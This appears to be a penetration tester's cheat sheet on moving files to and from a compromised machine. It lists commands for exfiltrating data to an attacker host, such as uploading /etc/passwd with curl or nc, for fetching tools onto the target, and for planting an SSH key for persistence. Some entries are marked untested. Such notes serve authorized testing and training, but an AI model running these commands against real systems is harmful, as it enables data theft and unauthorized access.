File transfer

Executables can be b64 encoded

Listeners

impacket-smbserver <share> .
smbserver.py <share> .
python -m SimpleHTTPServer <port>
python3 -m http.server <port>
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => <port>, :DocumentRoot => Dir.pwd).start"
php -S 0.0.0.0:<port>
nc -nlvp <port> < <file>

FTP
-w allows anonymous write access

pip install pyftpdlib
python -m pyftpdlib -p 21 -w

TFTP

service atftpd start
atftpd --daemon --port 69 /tftp
/etc/init.d/atftpd restart
auxiliary/server/tftp

Downloaders

wget <url>
curl -O <url> > file
fetch <url> #BSD

Exfiltration

If not mentionned, the first CLI is from Kali and the second from the compromised machine (RSH)

NC
nc -nvlp <port> > <file>
nc -nvv <ip> <port> < <file>
CURL
nc -nvlp 80 > out
curl -T </etc/passwd> <url_attacker>
curl --upload-file <file> --url http://<attacker_ip>/
SOCAT (not tested)
socat -u FILE:<file> TCP-LISTEN:<port>,reuseaddr
socat -u TCP:127.0.0.1:<port> OPEN:<out.dat>,creat
TFTP (not tested)
service atftpd start
auxiliary/server/tftp
tftp -i <ip> PUT <file>
tftp <ip> <<< "put <file1> <file2>"

Infiltration

If not mentionned, the first CLI is from Kali and the second from the compromised machine (RSH)

FTP
python -m pyftpdlib -p 21 -w
echo open <ip_target> > ftp.txt
echo USER anonymous >> ftp.txt
echo ftp >> ftp.txt 
echo bin >> ftp.txt
echo GET file >> ftp.txt
echo bye >> ftp.txt

ftp -v -n -s:ftp.txt
NC

On target

nc -nlvp <port> > <file>

On kali

nc <ip> <port> < file
SOCAT (not tested)
socat -u TCP-LISTEN:<port> 9876,reuseaddr OPEN:<out.txt>,creat && cat <out.txt>
socat -u FILE:<file> TCP:127.0.0.1:<port>
TFTP (not tested)
service atftpd start
auxiliary/server/tftp
tftp -i <ip> GET <file>
tftp <ip> <<< "get <file1> <file2>"
SSH

Add your SSH pub key in authorized keys on the compromised machine (RSH)

echo "ssh-rsa AAAA..." > authorized_keys

Kali

ssh -i <key> <user>@<ip>
SCP
scp </path/to/source/file.ext> <user>@<ip>:</path/to/destination/file.ext>

scp -r </path/to/source/dir> <user>@<ip>:</path/to/destination>